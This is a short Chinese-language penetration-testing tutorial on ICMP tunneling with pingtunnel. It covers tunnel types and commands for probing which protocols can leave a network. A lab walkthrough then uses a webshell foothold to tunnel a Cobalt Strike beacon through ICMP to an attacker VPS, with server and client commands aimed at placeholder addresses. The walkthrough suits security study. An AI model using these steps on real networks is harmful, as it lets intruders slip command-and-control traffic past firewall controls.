内网-ICMP隧道（pingtunnel）

常用的隧道技术：

利用各种隧道技术，以网络防火墙允许的协议，

绕过网络防火墙的封锁，实现访问被封锁的目标网络

网络层：IPv6 隧道、ICMP 隧道

传输层：TCP 隧道、UDP 隧道、常规端口转发

应用层：SSH 隧道、HTTP/S 隧道、DNS 隧道

协议 判断命令

ICMP ping ip or domain

HTTP   curl ip or domain

SSH    ssh  ip or domain

DNS     nslookup domain

TCP     telnet ip port

… …………….

环境准备

本机作为攻击机，一台vps作为C2服务器，以及隧道服务端。

靶机使用一台云服务器，开启防火墙。

 出站入站规则全部禁止，入站规则中添加web，允许访问80端口。

 出站规则中允许ICMP

 使用webshell连接web服务器。首先直接上传CS后门执行发现无法上线，之后信息收集，得到出网协议为ICMP。

隧道搭建

相关项目
https://github.com/esrrhs/pingtunnel

首先将工具上传至VPS启动服务端

./pingtunnel -type server

之后将工具通过webshell上传，在客户端启动

pingtunnel -type client -l :3333 -s x.x.x.x -t x.x.x.x:4444 -tcp 1 -noprint 1 -nolog 1

这条命令中，-l后的端口为本机端口，-s后为服务端IP，-t后为服务端地址以及端口。

之后连接成功后，服务端会有结果返回。

 在CS中需要新建两个监听器，一个监听器监听本机的地址端口，需要使用这个监听器生成后门，之后上传运行。

 因为流量为HTTP，经过隧道转发后到了VPS上服务端的相关端口上，所以监听对应的端口。

 之后执行发现可以上线。